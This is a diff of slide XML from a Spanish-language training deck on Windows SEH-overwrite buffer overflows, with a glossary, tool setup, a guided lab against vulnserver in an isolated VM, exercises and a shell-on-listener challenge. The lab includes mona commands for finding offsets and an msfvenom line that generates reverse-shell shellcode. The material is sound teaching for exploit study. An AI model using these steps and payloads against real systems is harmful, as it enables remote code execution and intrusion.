+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  coloca un short jmp al shellcode. Clave: técnica canónica de SEH.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SafeSEH: lista blanca de handlers válidos por módulo. Clave: obliga a usar un POP POP RET en</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4450,7 +4856,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4488,97 +4894,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Lanza vulnserver y conéctate con nc/pwntools; identifica el comando vulnerable (p. ej. GMON).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Provoca el crash enviando una cadena larga y observa en el debugger que la cadena SEH se sobrescribe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  (ver SEH chain).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Halla el offset a nSEH/SEH con un patrón cíclico:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  !mona pc 5000        ; genera patrón</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ; (crash)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  !mona findmsp        ; muestra offset a nSEH y SEH</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SEH — Structured Exception Handling de Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Excepción — Error (acceso inválido, división por cero) que dispara el manejo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cadena SEH — Lista de manejadores registrados, en la pila</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  nSEH — Puntero al siguiente registro de la cadena</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Handler — Puntero a la función manejadora de esta entrada</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SEH overwrite — Sobrescribir nSEH y Handler con un overflow</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4629,7 +5035,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4667,82 +5073,67 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Localiza los badchars del servicio con !mona bytearray y compara memoria.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Explica por qué se salta primero a nSEH y no directamente al shellcode.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Identifica un módulo sin SafeSEH en el proceso con !mona modules.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Sustituye el short jmp por un egghunter cuando el espacio es escaso.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Describe cómo SEHOP rompería tu cadena y qué haría falta.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Adapta el shellcode para evitar un badchar concreto (\x00, \x0a).</a:t>
+              <a:t>•  En una VM Windows aislada (sin red hacia producción):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  x64dbg o WinDbg (con la extensión de mona en Immunity Debugger clásico).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  mona.py de Corelan.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  vulnserver como objetivo de práctica legal.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  pwntools/python para enviar el payload por socket.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4793,7 +5184,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4831,52 +5222,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Sobre vulnserver en tu VM, consigue ejecución de código mediante sobrescritura de SEH y recibe una</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  shell en tu listener local.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: tu listener recibe una shell del proceso vulnserver; el payload usa un</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  POP POP RET de un módulo sin SafeSEH y un short jmp en nSEH.</a:t>
+              <a:t>•  Lanza vulnserver y conéctate con nc/pwntools; identifica el comando vulnerable (p. ej. GMON).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Provoca el crash enviando una cadena larga y observa en el debugger que la cadena SEH se sobrescribe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  (ver SEH chain).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Halla el offset a nSEH/SEH con un patrón cíclico:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Busca un POP POP RET en un módulo sin SafeSEH:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Construye el payload: [relleno][nSEH: short jmp][SEH: dir POP POP RET][NOPs][shellcode].</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Genera shellcode con msfvenom -p windows/shellreversetcp LHOST=&lt;vm&gt; LPORT=4444 -f python (para</a:t>
             </a:r>
           </a:p>
         </p:txBody>
